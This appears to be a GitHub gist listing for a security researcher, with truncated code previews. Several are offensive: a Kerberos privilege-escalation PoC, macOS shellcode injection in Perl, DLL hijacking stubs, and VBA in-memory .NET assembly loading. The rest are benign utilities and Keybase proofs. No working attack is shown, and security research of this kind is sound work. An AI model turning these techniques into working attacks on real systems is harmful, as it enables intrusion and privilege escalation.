
Nick Landers monoxgas

@monoxgas
monoxgas / urbandoor.cs
Created April 10, 2023 22:58
Minimal PoC code for Kerberos Unlock LPE (CVE-2023-21817)
using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtApiDotNet.Win32;
using NtApiDotNet.Win32.Rpc.Transport;
using NtApiDotNet.Win32.Security.Authentication;
using NtApiDotNet.Win32.Security.Authentication.Kerberos;
using NtApiDotNet.Win32.Security.Authentication.Kerberos.Client;
using NtApiDotNet.Win32.Security.Authentication.Kerberos.Server;
using NtApiDotNet.Win32.Security.Authentication.Logon;
using System;
@monoxgas
monoxgas / EraseTextBoxes.bas
Last active March 14, 2023 16:23 — forked from githubyouser/EraseTextBoxes.bas
Word VBA: Convert text boxes to plain text
'https://answers.microsoft.com/en-us/msoffice/forum/all/removing-text-box-from-word-document-without/a4d02b2f-d168-48dc-960b-4a45cbe79d86
Sub ReplaceTextBoxes()
    Dim RngDoc As Range, RngShp As Range, i As Long, boundary As String
    With ActiveDocument
        For i = .Shapes.Count To 1 Step -1
            With .Shapes(i)
                'If .Type = msoTextBox Then
                'https://eileenslounge.com/viewtopic.php?p=28255#p28255
                If .TextFrame.HasText = True Then
View keybase.md

Keybase proof

I hereby claim:

  • I am monoxgas on github.
  • I am monoxgas (https://keybase.io/monoxgas) on keybase.
  • I have a public key whose fingerprint is 8138 ABBC 8C08 62A4 1E16 A697 5856 495B 4691 8AB1

To claim this, I am signing this object:

@monoxgas
monoxgas / syscall.pl
Last active January 8, 2022 10:57
Perl syscall/sc injection for MacOS
use DynaLoader;
use Devel::Peek;
use Fcntl;
use 5.008001; # because 5.6 doesn't have B::PV::object_2svref
use Config;
use B (); # for B::PV
sub mmap {
    my ($addr, $size, $protect, $flags) = @_;
    syscall(197, $addr, $size, $protect, $flags, -1, 0);
@monoxgas
monoxgas / extract.cpp
Created May 25, 2021 22:06
MacOS Shared DYLD Cache Extraction (Big Sur)
// ref: https://opensource.apple.com/source/dyld/[VERSION]/launch-cache/dsc_extractor.cpp.auto.html
// > SDKROOT=`xcrun --sdk macosx --show-sdk-path`
// > clang++ -o extract extract.cpp
// > mkdir libraries
// > ./extract /System/Library/dyld/dyld_shared_cache_x86_64 `pwd`/libraries/
#include <stdio.h>
#include <stddef.h>
#include <dlfcn.h>
@monoxgas
monoxgas / vc_decrypt.py
Last active July 18, 2023 22:57
VoiceCrypt Crypto
import sys
import struct
import binascii
from itertools import cycle, zip_longest
from operator import itemgetter, xor
from collections import Counter
import re
# Some root key constants from the binary
View keybase.md

Keybase proof

I hereby claim:

  • I am monoxgas on github.
  • I am monoxgas (https://keybase.io/monoxgas) on keybase.
  • I have a public key ASCY7hWSUiJvdx6-976NCpVJx_ePWPOc6E3cuJz5PA8dygo

To claim this, I am signing this object:

@monoxgas
monoxgas / main.cpp
Created February 12, 2020 22:19
Adaptive DLL Hijacking - Patching LoadLibrary Return
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
BOOL PatchTheRet(HMODULE realModule) {
    // Get primary module info
@monoxgas
monoxgas / main.cpp
Created February 12, 2020 19:27
Adaptive DLL Hijacking - Stability Hooking
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
DWORD WINAPI Thread(LPVOID lpParam) {
    // Insert evil stuff
    ExitProcess(0);
@monoxgas
monoxgas / mscorlib_load_assembly.vba
Last active May 18, 2023 13:30
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&